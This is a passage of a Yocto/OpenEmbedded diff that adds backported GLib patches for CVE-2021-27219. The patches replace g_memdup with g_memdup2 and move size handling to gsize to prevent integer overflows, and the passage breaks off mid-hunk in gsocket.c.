+@@ -33,6 +33,7 @@
+ 
+ #include "glib-private.h"
+ #include "gconstructor.h"
++#include "gstrfuncsprivate.h"
+ 
+ #ifdef G_OS_WIN32
+ #include <windows.h>
+@@ -1470,7 +1471,7 @@ type_add_interface_Wm (TypeNode
+   iholder->next = iface_node_get_holders_L (iface);
+   iface_node_set_holders_W (iface, iholder);
+   iholder->instance_type = NODE_TYPE (node);
+-  iholder->info = info ? g_memdup (info, sizeof (*info)) : NULL;
++  iholder->info = info ? g_memdup2 (info, sizeof (*info)) : NULL;
+   iholder->plugin = plugin;
+ 
+   /* create an iface entry for this type */
+@@ -1731,7 +1732,7 @@ type_iface_retrieve_holder_info_Wm (Type
+         INVALID_RECURSION ("g_type_plugin_*", iholder->plugin, NODE_NAME (iface));
+       
+       check_interface_info_I (iface, instance_type, &tmp_info);
+-      iholder->info = g_memdup (&tmp_info, sizeof (tmp_info));
++      iholder->info = g_memdup2 (&tmp_info, sizeof (tmp_info));
+     }
+   
+   return iholder;	/* we don't modify write lock upon returning NULL */
+@@ -2016,10 +2017,10 @@ type_iface_vtable_base_init_Wm (TypeNode
+       IFaceEntry *pentry = type_lookup_iface_entry_L (pnode, iface);
+       
+       if (pentry)
+-	vtable = g_memdup (pentry->vtable, iface->data->iface.vtable_size);
++	vtable = g_memdup2 (pentry->vtable, iface->data->iface.vtable_size);
+     }
+   if (!vtable)
+-    vtable = g_memdup (iface->data->iface.dflt_vtable, iface->data->iface.vtable_size);
++    vtable = g_memdup2 (iface->data->iface.dflt_vtable, iface->data->iface.vtable_size);
+   entry->vtable = vtable;
+   vtable->g_type = NODE_TYPE (iface);
+   vtable->g_instance_type = NODE_TYPE (node);
+--- a/gobject/gtypemodule.c
++++ b/gobject/gtypemodule.c
+@@ -19,6 +19,7 @@
+ 
+ #include <stdlib.h>
+ 
++#include "gstrfuncsprivate.h"
+ #include "gtypeplugin.h"
+ #include "gtypemodule.h"
+ 
+@@ -436,7 +437,7 @@ g_type_module_register_type (GTypeModule
+   module_type_info->loaded = TRUE;
+   module_type_info->info = *type_info;
+   if (type_info->value_table)
+-    module_type_info->info.value_table = g_memdup (type_info->value_table,
++    module_type_info->info.value_table = g_memdup2 (type_info->value_table,
+ 						   sizeof (GTypeValueTable));
+ 
+   return module_type_info->type;
+--- a/gobject/tests/param.c
++++ b/gobject/tests/param.c
+@@ -2,6 +2,8 @@
+ #include <glib-object.h>
+ #include <stdlib.h>
+ 
++#include "gstrfuncsprivate.h"
++
+ static void
+ test_param_value (void)
+ {
+@@ -874,7 +876,7 @@ main (int argc, char *argv[])
+             test_path = g_strdup_printf ("/param/implement/subprocess/%d-%d-%d-%d",
+                                          data.change_this_flag, data.change_this_type,
+                                          data.use_this_flag, data.use_this_type);
+-            test_data = g_memdup (&data, sizeof (TestParamImplementData));
++            test_data = g_memdup2 (&data, sizeof (TestParamImplementData));
+             g_test_add_data_func_full (test_path, test_data, test_param_implement_child, g_free);
+             g_free (test_path);
+           }
diff --git a/meta/recipes-core/glib-2.0/glib-2.0/CVE-2021-27219-04.patch b/meta/recipes-core/glib-2.0/glib-2.0/CVE-2021-27219-04.patch
new file mode 100644
index 0000000000..6a3ac6b552
--- /dev/null
+++ b/meta/recipes-core/glib-2.0/glib-2.0/CVE-2021-27219-04.patch
@@ -0,0 +1,298 @@
+Backport of:
+
+From 0736b7c1e7cf4232c5d7eb2b0fbfe9be81bd3baa Mon Sep 17 00:00:00 2001
+From: Philip Withnall <pwithnall@endlessos.org>
+Date: Thu, 4 Feb 2021 13:41:21 +0000
+Subject: [PATCH 04/11] glib: Use g_memdup2() instead of g_memdup() in obvious
+ places
+MIME-Version: 1.0
+Content-Type: text/plain; charset=UTF-8
+Content-Transfer-Encoding: 8bit
+
+Convert all the call sites which use `g_memdup()`’s length argument
+trivially (for example, by passing a `sizeof()` or an existing `gsize`
+variable), so that they use `g_memdup2()` instead.
+
+In almost all of these cases the use of `g_memdup()` would not have
+caused problems, but it will soon be deprecated, so best port away from
+it
+
+In particular, this fixes an overflow within `g_bytes_new()`, identified
+as GHSL-2021-045 by GHSL team member Kevin Backhouse.
+
+Signed-off-by: Philip Withnall <pwithnall@endlessos.org>
+Fixes: GHSL-2021-045
+Helps: #2319
+
+Upstream-Status: Backport [https://mirrors.ocf.berkeley.edu/ubuntu/pool/main/g/glib2.0/glib2.0_2.64.6-1~ubuntu20.04.3.debian.tar.xz]
+CVE: CVE-2021-27219
+Signed-off-by: Neetika Singh <Neetika.Singh@kpit.com>
+Signed-off-by: Ranjitsinh Rathod <ranjitsinh.rathod@kpit.com>
+
+---
+ glib/gbytes.c               | 6 ++++--
+ glib/gdir.c                 | 3 ++-
+ glib/ghash.c                | 7 ++++---
+ glib/giochannel.c           | 5 +++--
+ glib/gslice.c               | 3 ++-
+ glib/gtestutils.c           | 3 ++-
+ glib/gvariant.c             | 7 ++++---
+ glib/gvarianttype.c         | 3 ++-
+ glib/tests/array-test.c     | 4 +++-
+ glib/tests/option-context.c | 6 ++++--
+ glib/tests/uri.c            | 8 +++++---
+ 11 files changed, 35 insertions(+), 20 deletions(-)
+
+--- a/glib/gbytes.c
++++ b/glib/gbytes.c
+@@ -34,6 +34,8 @@
+ 
+ #include <string.h>
+ 
++#include "gstrfuncsprivate.h"
++
+ /**
+  * GBytes:
+  *
+@@ -95,7 +97,7 @@ g_bytes_new (gconstpointer data,
+ {
+   g_return_val_if_fail (data != NULL || size == 0, NULL);
+ 
+-  return g_bytes_new_take (g_memdup (data, size), size);
++  return g_bytes_new_take (g_memdup2 (data, size), size);
+ }
+ 
+ /**
+@@ -499,7 +501,7 @@ g_bytes_unref_to_data (GBytes *bytes,
+        * Copy: Non g_malloc (or compatible) allocator, or static memory,
+        * so we have to copy, and then unref.
+        */
+-      result = g_memdup (bytes->data, bytes->size);
++      result = g_memdup2 (bytes->data, bytes->size);
+       *size = bytes->size;
+       g_bytes_unref (bytes);
+     }
+--- a/glib/gdir.c
++++ b/glib/gdir.c
+@@ -37,6 +37,7 @@
+ #include "gconvert.h"
+ #include "gfileutils.h"
+ #include "gstrfuncs.h"
++#include "gstrfuncsprivate.h"
+ #include "gtestutils.h"
+ #include "glibintl.h"
+ 
+@@ -112,7 +113,7 @@ g_dir_open_with_errno (const gchar *path
+     return NULL;
+ #endif
+ 
+-  return g_memdup (&dir, sizeof dir);
++  return g_memdup2 (&dir, sizeof dir);
+ }
+ 
+ /**
+--- a/glib/ghash.c
++++ b/glib/ghash.c
+@@ -34,6 +34,7 @@
+ #include "gmacros.h"
+ #include "glib-private.h"
+ #include "gstrfuncs.h"
++#include "gstrfuncsprivate.h"
+ #include "gatomic.h"
+ #include "gtestutils.h"
+ #include "gslice.h"
+@@ -962,7 +963,7 @@ g_hash_table_ensure_keyval_fits (GHashTa
+       if (hash_table->have_big_keys)
+         {
+           if (key != value)
+-            hash_table->values = g_memdup (hash_table->keys, sizeof (gpointer) * hash_table->size);
++            hash_table->values = g_memdup2 (hash_table->keys, sizeof (gpointer) * hash_table->size);
+           /* Keys and values are both big now, so no need for further checks */
+           return;
+         }
+@@ -970,7 +971,7 @@ g_hash_table_ensure_keyval_fits (GHashTa
+         {
+           if (key != value)
+             {
+-              hash_table->values = g_memdup (hash_table->keys, sizeof (guint) * hash_table->size);
++              hash_table->values = g_memdup2 (hash_table->keys, sizeof (guint) * hash_table->size);
+               is_a_set = FALSE;
+             }
+         }
+@@ -998,7 +999,7 @@ g_hash_table_ensure_keyval_fits (GHashTa
+ 
+   /* Just split if necessary */
+   if (is_a_set && key != value)
+-    hash_table->values = g_memdup (hash_table->keys, sizeof (gpointer) * hash_table->size);
++    hash_table->values = g_memdup2 (hash_table->keys, sizeof (gpointer) * hash_table->size);
+ 
+ #endif
+ }
+--- a/glib/giochannel.c
++++ b/glib/giochannel.c
+@@ -35,7 +35,7 @@
+ #include <errno.h>
+
+ #include "giochannel.h"
+-
++#include "gstrfuncsprivate.h"
+ #include "gstrfuncs.h"
+ #include "gtestutils.h"
+ #include "glibintl.h"
+
+@@ -1673,10 +1674,10 @@ g_io_channel_read_line (GIOChannel  *cha
+
+       /* Copy the read bytes (including any embedded nuls) and nul-terminate.
+        * `USE_BUF (channel)->str` is guaranteed to be nul-terminated as it’s a
+-       * #GString, so it’s safe to call g_memdup() with +1 length to allocate
++       * #GString, so it’s safe to call g_memdup2() with +1 length to allocate
+        * a nul-terminator. */
+       g_assert (USE_BUF (channel));
+-      line = g_memdup (USE_BUF (channel)->str, got_length + 1);
++      line = g_memdup2 (USE_BUF (channel)->str, got_length + 1);
+       line[got_length] = '\0';
+       *str_return = g_steal_pointer (&line);
+       g_string_erase (USE_BUF (channel), 0, got_length);
+--- a/glib/gslice.c
++++ b/glib/gslice.c
+@@ -41,6 +41,7 @@
+ #include "gmain.h"
+ #include "gmem.h"               /* gslice.h */
+ #include "gstrfuncs.h"
++#include "gstrfuncsprivate.h"
+ #include "gutils.h"
+ #include "gtrashstack.h"
+ #include "gtestutils.h"
+@@ -350,7 +351,7 @@ g_slice_get_config_state (GSliceConfig c
+       array[i++] = allocator->contention_counters[address];
+       array[i++] = allocator_get_magazine_threshold (allocator, address);
+       *n_values = i;
+-      return g_memdup (array, sizeof (array[0]) * *n_values);
++      return g_memdup2 (array, sizeof (array[0]) * *n_values);
+     default:
+       return NULL;
+     }
+--- a/glib/gtestutils.c
++++ b/glib/gtestutils.c
+@@ -49,6 +49,7 @@
+ #include "gpattern.h"
+ #include "grand.h"
+ #include "gstrfuncs.h"
++#include "gstrfuncsprivate.h"
+ #include "gtimer.h"
+ #include "gslice.h"
+ #include "gspawn.h"
+@@ -3803,7 +3804,7 @@ g_test_log_extract (GTestLogBuffer *tbuf
+       if (p <= tbuffer->data->str + mlength)
+         {
+           g_string_erase (tbuffer->data, 0, mlength);
+-          tbuffer->msgs = g_slist_prepend (tbuffer->msgs, g_memdup (&msg, sizeof (msg)));
++          tbuffer->msgs = g_slist_prepend (tbuffer->msgs, g_memdup2 (&msg, sizeof (msg)));
+           return TRUE;
+         }
+ 
+--- a/glib/gvariant.c
++++ b/glib/gvariant.c
+@@ -33,6 +33,7 @@
+ 
+ #include <string.h>
+ 
++#include "gstrfuncsprivate.h"
+ 
+ /**
+  * SECTION:gvariant
+@@ -725,7 +726,7 @@ g_variant_new_variant (GVariant *value)
+   g_variant_ref_sink (value);
+ 
+   return g_variant_new_from_children (G_VARIANT_TYPE_VARIANT,
+-                                      g_memdup (&value, sizeof value),
++                                      g_memdup2 (&value, sizeof value),
+                                       1, g_variant_is_trusted (value));
+ }
+ 
+@@ -1229,7 +1230,7 @@ g_variant_new_fixed_array (const GVarian
+       return NULL;
+     }
+ 
+-  data = g_memdup (elements, n_elements * element_size);
++  data = g_memdup2 (elements, n_elements * element_size);
+   value = g_variant_new_from_data (array_type, data,
+                                    n_elements * element_size,
+                                    FALSE, g_free, data);
+@@ -1908,7 +1909,7 @@ g_variant_dup_bytestring (GVariant *valu
+   if (length)
+     *length = size;
+ 
+-  return g_memdup (original, size + 1);
++  return g_memdup2 (original, size + 1);
+ }
+ 
+ /**
+--- a/glib/gvarianttype.c
++++ b/glib/gvarianttype.c
+@@ -28,6 +28,7 @@
+ 
+ #include <string.h>
+ 
++#include "gstrfuncsprivate.h"
+ 
+ /**
+  * SECTION:gvarianttype
+@@ -1181,7 +1182,7 @@ g_variant_type_new_tuple (const GVariant
+   g_assert (offset < sizeof buffer);
+   buffer[offset++] = ')';
+ 
+-  return (GVariantType *) g_memdup (buffer, offset);
++  return (GVariantType *) g_memdup2 (buffer, offset);
+ }
+ 
+ /**
+--- a/glib/tests/array-test.c
++++ b/glib/tests/array-test.c
+@@ -29,6 +29,8 @@
+ #include <string.h>
+ #include "glib.h"
+ 
++#include "gstrfuncsprivate.h"
++
+ /* Test data to be passed to any function which calls g_array_new(), providing
+  * the parameters for that call. Most #GArray tests should be repeated for all
+  * possible values of #ArrayTestData. */
+@@ -1917,7 +1919,7 @@ byte_array_new_take (void)
+   GByteArray *gbarray;
+   guint8 *data;
+ 
+-  data = g_memdup ("woooweeewow", 11);
++  data = g_memdup2 ("woooweeewow", 11);
+   gbarray = g_byte_array_new_take (data, 11);
+   g_assert (gbarray->data == data);
+   g_assert_cmpuint (gbarray->len, ==, 11);
+--- a/glib/tests/option-context.c
++++ b/glib/tests/option-context.c
+@@ -27,6 +27,8 @@
+ #include <string.h>
+ #include <locale.h>
+ 
++#include "gstrfuncsprivate.h"
++
+ static GOptionEntry main_entries[] = {
+   { "main-switch", 0, 0,
+     G_OPTION_ARG_NONE, NULL,
+@@ -256,7 +258,7 @@ join_stringv (int argc, char **argv)
+ static char **
+ copy_stringv (char **argv, int argc)
+ {
+-  return g_memdup (argv, sizeof (char *) * (argc + 1));
++  return g_memdup2 (argv, sizeof (char *) * (argc + 1));
+ }
+ 
+ static void
+@@ -2323,7 +2325,7 @@ test_group_parse (void)
+   g_option_context_add_group (context, group);
+ 
+   argv = split_string ("program --test arg1 -f arg2 --group-test arg3 --frob arg4 -z arg5", &argc);
+-  orig_argv = g_memdup (argv, (argc + 1) * sizeof (char *));
++  orig_argv = g_memdup2 (argv, (argc + 1) * sizeof (char *));
+ 
+   retval = g_option_context_parse (context, &argc, &argv, &error);
+ 
diff --git a/meta/recipes-core/glib-2.0/glib-2.0/CVE-2021-27219-05.patch b/meta/recipes-core/glib-2.0/glib-2.0/CVE-2021-27219-05.patch
new file mode 100644
index 0000000000..4f86522d00
--- /dev/null
+++ b/meta/recipes-core/glib-2.0/glib-2.0/CVE-2021-27219-05.patch
@@ -0,0 +1,54 @@
+From 0cbad673215ec8a049b7fe2ff44b0beed31b376e Mon Sep 17 00:00:00 2001
+From: Philip Withnall <pwithnall@endlessos.org>
+Date: Thu, 4 Feb 2021 16:12:24 +0000
+Subject: [PATCH 05/11] gwinhttpfile: Avoid arithmetic overflow when
+ calculating a size
+MIME-Version: 1.0
+Content-Type: text/plain; charset=UTF-8
+Content-Transfer-Encoding: 8bit
+
+The members of `URL_COMPONENTS` (`winhttp_file->url`) are `DWORD`s, i.e.
+32-bit unsigned integers. Adding to and multiplying them may cause them
+to overflow the unsigned integer bounds, even if the result is passed to
+`g_memdup2()` which accepts a `gsize`.
+
+Cast the `URL_COMPONENTS` members to `gsize` first to ensure that the
+arithmetic is done in terms of `gsize`s rather than unsigned integers.
+
+Spotted by Sebastian Dröge.
+
+Signed-off-by: Philip Withnall <pwithnall@endlessos.org>
+Helps: #2319
+
+Upstream-Status: Backport [https://mirrors.ocf.berkeley.edu/ubuntu/pool/main/g/glib2.0/glib2.0_2.64.6-1~ubuntu20.04.3.debian.tar.xz]
+CVE: CVE-2021-27219
+Signed-off-by: Neetika Singh <Neetika.Singh@kpit.com>
+Signed-off-by: Ranjitsinh Rathod <ranjitsinh.rathod@kpit.com>
+
+---
+ gio/win32/gwinhttpfile.c | 8 ++++----
+ 1 file changed, 4 insertions(+), 4 deletions(-)
+
+diff --git a/gio/win32/gwinhttpfile.c b/gio/win32/gwinhttpfile.c
+index 3f8fbd838..e0340e247 100644
+--- a/gio/win32/gwinhttpfile.c
++++ b/gio/win32/gwinhttpfile.c
+@@ -410,10 +410,10 @@ g_winhttp_file_resolve_relative_path (GFile      *file,
+   child = g_object_new (G_TYPE_WINHTTP_FILE, NULL);
+   child->vfs = winhttp_file->vfs;
+   child->url = winhttp_file->url;
+-  child->url.lpszScheme = g_memdup2 (winhttp_file->url.lpszScheme, (winhttp_file->url.dwSchemeLength+1)*2);
+-  child->url.lpszHostName = g_memdup2 (winhttp_file->url.lpszHostName, (winhttp_file->url.dwHostNameLength+1)*2);
+-  child->url.lpszUserName = g_memdup2 (winhttp_file->url.lpszUserName, (winhttp_file->url.dwUserNameLength+1)*2);
+-  child->url.lpszPassword = g_memdup2 (winhttp_file->url.lpszPassword, (winhttp_file->url.dwPasswordLength+1)*2);
++  child->url.lpszScheme = g_memdup2 (winhttp_file->url.lpszScheme, ((gsize) winhttp_file->url.dwSchemeLength + 1) * 2);
++  child->url.lpszHostName = g_memdup2 (winhttp_file->url.lpszHostName, ((gsize) winhttp_file->url.dwHostNameLength + 1) * 2);
++  child->url.lpszUserName = g_memdup2 (winhttp_file->url.lpszUserName, ((gsize) winhttp_file->url.dwUserNameLength + 1) * 2);
++  child->url.lpszPassword = g_memdup2 (winhttp_file->url.lpszPassword, ((gsize) winhttp_file->url.dwPasswordLength + 1) * 2);
+   child->url.lpszUrlPath = wnew_path;
+   child->url.dwUrlPathLength = wcslen (wnew_path);
+   child->url.lpszExtraInfo = NULL;
+-- 
+GitLab
+
+
diff --git a/meta/recipes-core/glib-2.0/glib-2.0/CVE-2021-27219-06.patch b/meta/recipes-core/glib-2.0/glib-2.0/CVE-2021-27219-06.patch
new file mode 100644
index 0000000000..d8043f5e29
--- /dev/null
+++ b/meta/recipes-core/glib-2.0/glib-2.0/CVE-2021-27219-06.patch
@@ -0,0 +1,101 @@
+From f9ee2275cbc312c0b4cdbc338a4fbb76eb36fb9a Mon Sep 17 00:00:00 2001
+From: Philip Withnall <pwithnall@endlessos.org>
+Date: Thu, 4 Feb 2021 13:49:00 +0000
+Subject: [PATCH 06/11] gdatainputstream: Handle stop_chars_len internally as
+ gsize
+
+Previously it was handled as a `gssize`, which meant that if the
+`stop_chars` string was longer than `G_MAXSSIZE` there would be an
+overflow.
+
+Signed-off-by: Philip Withnall <pwithnall@endlessos.org>
+Helps: #2319
+
+Upstream-Status: Backport [https://mirrors.ocf.berkeley.edu/ubuntu/pool/main/g/glib2.0/glib2.0_2.64.6-1~ubuntu20.04.3.debian.tar.xz]
+CVE: CVE-2021-27219
+Signed-off-by: Neetika Singh <Neetika.Singh@kpit.com>
+Signed-off-by: Ranjitsinh Rathod <ranjitsinh.rathod@kpit.com>
+
+---
+ gio/gdatainputstream.c | 25 +++++++++++++++++--------
+ 1 file changed, 17 insertions(+), 8 deletions(-)
+
+diff --git a/gio/gdatainputstream.c b/gio/gdatainputstream.c
+index 2e7750cb5..2cdcbda19 100644
+--- a/gio/gdatainputstream.c
++++ b/gio/gdatainputstream.c
+@@ -27,6 +27,7 @@
+ #include "gioenumtypes.h"
+ #include "gioerror.h"
+ #include "glibintl.h"
++#include "gstrfuncsprivate.h"
+ 
+ #include <string.h>
+ 
+@@ -856,7 +857,7 @@ static gssize
+ scan_for_chars (GDataInputStream *stream,
+ 		gsize            *checked_out,
+ 		const char       *stop_chars,
+-                gssize            stop_chars_len)
++                gsize             stop_chars_len)
+ {
+   GBufferedInputStream *bstream;
+   const char *buffer;
+@@ -952,7 +953,7 @@ typedef struct
+   gsize checked;
+ 
+   gchar *stop_chars;
+-  gssize stop_chars_len;
++  gsize stop_chars_len;
+   gsize length;
+ } GDataInputStreamReadData;
+ 
+@@ -1078,12 +1079,17 @@ g_data_input_stream_read_async (GDataInputStream    *stream,
+ {
+   GDataInputStreamReadData *data;
+   GTask *task;
++  gsize stop_chars_len_unsigned;
+ 
+   data = g_slice_new0 (GDataInputStreamReadData);
+-  if (stop_chars_len == -1)
+-    stop_chars_len = strlen (stop_chars);
+-  data->stop_chars = g_memdup (stop_chars, stop_chars_len);
+-  data->stop_chars_len = stop_chars_len;
++
++  if (stop_chars_len < 0)
++    stop_chars_len_unsigned = strlen (stop_chars);
++  else
++    stop_chars_len_unsigned = (gsize) stop_chars_len;
++
++  data->stop_chars = g_memdup2 (stop_chars, stop_chars_len_unsigned);
++  data->stop_chars_len = stop_chars_len_unsigned;
+   data->last_saw_cr = FALSE;
+ 
+   task = g_task_new (stream, cancellable, callback, user_data);
+@@ -1338,17 +1344,20 @@ g_data_input_stream_read_upto (GDataInputStream  *stream,
+   gssize found_pos;
+   gssize res;
+   char *data_until;
++  gsize stop_chars_len_unsigned;
+ 
+   g_return_val_if_fail (G_IS_DATA_INPUT_STREAM (stream), NULL);
+ 
+   if (stop_chars_len < 0)
+-    stop_chars_len = strlen (stop_chars);
++    stop_chars_len_unsigned = strlen (stop_chars);
++  else
++    stop_chars_len_unsigned = (gsize) stop_chars_len;
+ 
+   bstream = G_BUFFERED_INPUT_STREAM (stream);
+ 
+   checked = 0;
+ 
+-  while ((found_pos = scan_for_chars (stream, &checked, stop_chars, stop_chars_len)) == -1)
++  while ((found_pos = scan_for_chars (stream, &checked, stop_chars, stop_chars_len_unsigned)) == -1)
+     {
+       if (g_buffered_input_stream_get_available (bstream) ==
+           g_buffered_input_stream_get_buffer_size (bstream))
+-- 
+GitLab
+
+
diff --git a/meta/recipes-core/glib-2.0/glib-2.0/CVE-2021-27219-07.patch b/meta/recipes-core/glib-2.0/glib-2.0/CVE-2021-27219-07.patch
new file mode 100644
index 0000000000..f183939c45
--- /dev/null
+++ b/meta/recipes-core/glib-2.0/glib-2.0/CVE-2021-27219-07.patch
@@ -0,0 +1,76 @@
+From 2aaf593a9eb96d84fe3be740aca2810a97d95592 Mon Sep 17 00:00:00 2001
+From: Philip Withnall <pwithnall@endlessos.org>
+Date: Thu, 4 Feb 2021 13:50:37 +0000
+Subject: [PATCH 07/11] gwin32: Use gsize internally in g_wcsdup()
+MIME-Version: 1.0
+Content-Type: text/plain; charset=UTF-8
+Content-Transfer-Encoding: 8bit
+
+This allows it to handle strings up to length `G_MAXSIZE` — previously
+it would overflow with such strings.
+
+Update the several copies of it identically.
+
+Signed-off-by: Philip Withnall <pwithnall@endlessos.org>
+Helps: #2319
+
+Upstream-Status: Backport [https://mirrors.ocf.berkeley.edu/ubuntu/pool/main/g/glib2.0/glib2.0_2.64.6-1~ubuntu20.04.3.debian.tar.xz]
+CVE: CVE-2021-27219
+Signed-off-by: Neetika Singh <Neetika.Singh@kpit.com>
+Signed-off-by: Ranjitsinh Rathod <ranjitsinh.rathod@kpit.com>
+
+---
+ gio/gwin32registrykey.c | 34 ++++++++++++++++++++++++++--------
+ 2 files changed, 38 insertions(+), 16 deletions(-)
+
+diff --git a/gio/gwin32registrykey.c b/gio/gwin32registrykey.c
+index 548a94188..2eb67daf8 100644
+--- a/gio/gwin32registrykey.c
++++ b/gio/gwin32registrykey.c
+@@ -127,16 +127,34 @@ typedef enum
+   G_WIN32_REGISTRY_UPDATED_PATH = 1,
+ } GWin32RegistryKeyUpdateFlag;
+ 
++static gsize
++g_utf16_len (const gunichar2 *str)
++{
++  gsize result;
++
++  for (result = 0; str[0] != 0; str++, result++)
++    ;
++
++  return result;
++}
++
+ static gunichar2 *
+-g_wcsdup (const gunichar2 *str,
+-          gssize           str_size)
++g_wcsdup (const gunichar2 *str, gssize str_len)
+ {
+-  if (str_size == -1)
+-    {
+-      str_size = wcslen (str) + 1;
+-      str_size *= sizeof (gunichar2);
+-    }
+-  return g_memdup (str, str_size);
++  gsize str_len_unsigned;
++  gsize str_size;
++
++  g_return_val_if_fail (str != NULL, NULL);
++
++  if (str_len < 0)
++    str_len_unsigned = g_utf16_len (str);
++  else
++    str_len_unsigned = (gsize) str_len;
++
++  g_assert (str_len_unsigned <= G_MAXSIZE / sizeof (gunichar2) - 1);
++  str_size = (str_len_unsigned + 1) * sizeof (gunichar2);
++
++  return g_memdup2 (str, str_size);
+ }
+ 
+ /**
+-- 
+GitLab
+
+
diff --git a/meta/recipes-core/glib-2.0/glib-2.0/CVE-2021-27219-08.patch b/meta/recipes-core/glib-2.0/glib-2.0/CVE-2021-27219-08.patch
new file mode 100644
index 0000000000..ffafc35c07
--- /dev/null
+++ b/meta/recipes-core/glib-2.0/glib-2.0/CVE-2021-27219-08.patch
@@ -0,0 +1,101 @@
+From ba8ca443051f93a74c0d03d62e70402036f967a5 Mon Sep 17 00:00:00 2001
+From: Philip Withnall <pwithnall@endlessos.org>
+Date: Thu, 4 Feb 2021 13:58:32 +0000
+Subject: [PATCH 08/11] gkeyfilesettingsbackend: Handle long keys when
+ converting paths
+
+Previously, the code in `convert_path()` could not handle keys longer
+than `G_MAXINT`, and would overflow if that was exceeded.
+
+Convert the code to use `gsize` and `g_memdup2()` throughout, and
+change from identifying the position of the final slash in the string
+using a signed offset `i`, to using a pointer to the character (and
+`strrchr()`). This allows the slash to be at any position in a
+`G_MAXSIZE`-long string, without sacrificing a bit of the offset for
+indicating whether a slash was found.
+
+Signed-off-by: Philip Withnall <pwithnall@endlessos.org>
+Helps: #2319
+
+Upstream-Status: Backport [https://mirrors.ocf.berkeley.edu/ubuntu/pool/main/g/glib2.0/glib2.0_2.64.6-1~ubuntu20.04.3.debian.tar.xz]
+CVE: CVE-2021-27219
+Signed-off-by: Neetika Singh <Neetika.Singh@kpit.com>
+Signed-off-by: Ranjitsinh Rathod <ranjitsinh.rathod@kpit.com>
+
+---
+ gio/gkeyfilesettingsbackend.c | 21 ++++++++++-----------
+ 1 file changed, 10 insertions(+), 11 deletions(-)
+
+diff --git a/gio/gkeyfilesettingsbackend.c b/gio/gkeyfilesettingsbackend.c
+index cd5765afd..25b057672 100644
+--- a/gio/gkeyfilesettingsbackend.c
++++ b/gio/gkeyfilesettingsbackend.c
+@@ -33,6 +33,7 @@
+ #include "gfilemonitor.h"
+ #include "gsimplepermission.h"
+ #include "gsettingsbackendinternal.h"
++#include "gstrfuncsprivate.h"
+ #include "giomodule-priv.h"
+ #include "gportalsupport.h"
+ 
+@@ -145,8 +146,8 @@ convert_path (GKeyfileSettingsBackend  *kfsb,
+               gchar                   **group,
+               gchar                   **basename)
+ {
+-  gint key_len = strlen (key);
+-  gint i;
++  gsize key_len = strlen (key);
++  const gchar *last_slash;
+ 
+   if (key_len < kfsb->prefix_len ||
+       memcmp (key, kfsb->prefix, kfsb->prefix_len) != 0)
+@@ -155,38 +156,36 @@ convert_path (GKeyfileSettingsBackend  *kfsb,
+   key_len -= kfsb->prefix_len;
+   key += kfsb->prefix_len;
+ 
+-  for (i = key_len; i >= 0; i--)
+-    if (key[i] == '/')
+-      break;
++  last_slash = strrchr (key, '/');
+ 
+   if (kfsb->root_group)
+     {
+       /* if a root_group was specified, make sure the user hasn't given
+        * a path that ghosts that group name
+        */
+-      if (i == kfsb->root_group_len && memcmp (key, kfsb->root_group, i) == 0)
++      if (last_slash != NULL && (last_slash - key) == kfsb->root_group_len && memcmp (key, kfsb->root_group, last_slash - key) == 0)
+         return FALSE;
+     }
+   else
+     {
+       /* if no root_group was given, ensure that the user gave a path */
+-      if (i == -1)
++      if (last_slash == NULL)
+         return FALSE;
+     }
+ 
+   if (group)
+     {
+-      if (i >= 0)
++      if (last_slash != NULL)
+         {
+-          *group = g_memdup (key, i + 1);
+-          (*group)[i] = '\0';
++          *group = g_memdup2 (key, (last_slash - key) + 1);
++          (*group)[(last_slash - key)] = '\0';
+         }
+       else
+         *group = g_strdup (kfsb->root_group);
+     }
+ 
+   if (basename)
+-    *basename = g_memdup (key + i + 1, key_len - i);
++    *basename = g_memdup2 (last_slash + 1, key_len - (last_slash - key));
+ 
+   return TRUE;
+ }
+-- 
+GitLab
+
+
diff --git a/meta/recipes-core/glib-2.0/glib-2.0/CVE-2021-27219-09.patch b/meta/recipes-core/glib-2.0/glib-2.0/CVE-2021-27219-09.patch
new file mode 100644
index 0000000000..8efb7c720f
--- /dev/null
+++ b/meta/recipes-core/glib-2.0/glib-2.0/CVE-2021-27219-09.patch
@@ -0,0 +1,100 @@
+From 65ec7f4d6e8832c481f6e00e2eb007b9a60024ce Mon Sep 17 00:00:00 2001
+From: Philip Withnall <pwithnall@endlessos.org>
+Date: Thu, 4 Feb 2021 14:00:53 +0000
+Subject: [PATCH 09/11] =?UTF-8?q?gsocket:=20Use=20gsize=20to=20track=20nat?=
+ =?UTF-8?q?ive=20sockaddr=E2=80=99s=20size?=
+MIME-Version: 1.0
+Content-Type: text/plain; charset=UTF-8
+Content-Transfer-Encoding: 8bit
+
+Don’t use an `int`, that’s potentially too small. In practical terms,
+this is not a problem, since no socket address is going to be that big.
+
+By making these changes we can use `g_memdup2()` without warnings,
+though. Fewer warnings is good.
+
+Signed-off-by: Philip Withnall <pwithnall@endlessos.org>
+Helps: #2319
+
+Upstream-Status: Backport [https://mirrors.ocf.berkeley.edu/ubuntu/pool/main/g/glib2.0/glib2.0_2.64.6-1~ubuntu20.04.3.debian.tar.xz]
+CVE: CVE-2021-27219
+Signed-off-by: Neetika Singh <Neetika.Singh@kpit.com>
+Signed-off-by: Ranjitsinh Rathod <ranjitsinh.rathod@kpit.com>
+
+---
+ gio/gsocket.c | 16 ++++++++++------
+ 1 file changed, 10 insertions(+), 6 deletions(-)
+
+--- a/gio/gsocket.c
++++ b/gio/gsocket.c
+@@ -75,6 +75,7 @@
+ #include "gcredentialsprivate.h"
+ #include "glibintl.h"
+ #include "gioprivate.h"
++#include "gstrfuncsprivate.h"
+ 
+ #ifdef G_OS_WIN32
+ /* For Windows XP runtime compatibility, but use the system's if_nametoindex() if available */
+@@ -174,7 +175,7 @@ static gboolean     g_socket_datagram_ba
+                                                                   GError          **error);
+ 
+ static GSocketAddress *
+-cache_recv_address (GSocket *socket, struct sockaddr *native, int native_len);
++cache_recv_address (GSocket *socket, struct sockaddr *native, size_t native_len);
+ 
+ static gssize
+ g_socket_receive_message_with_timeout  (GSocket                 *socket,
+@@ -260,7 +261,7 @@ struct _GSocketPrivate
+   struct {
+     GSocketAddress *addr;
+     struct sockaddr *native;
+-    gint native_len;
++    gsize native_len;
+     guint64 last_used;
+   } recv_addr_cache[RECV_ADDR_CACHE_SIZE];
+ };
+@@ -5259,14 +5260,14 @@ g_socket_send_messages_with_timeout (GSo
+ }
+ 
+ static GSocketAddress *
+-cache_recv_address (GSocket *socket, struct sockaddr *native, int native_len)
++cache_recv_address (GSocket *socket, struct sockaddr *native, size_t native_len)
+ {
+   GSocketAddress *saddr;
+   gint i;
+   guint64 oldest_time = G_MAXUINT64;
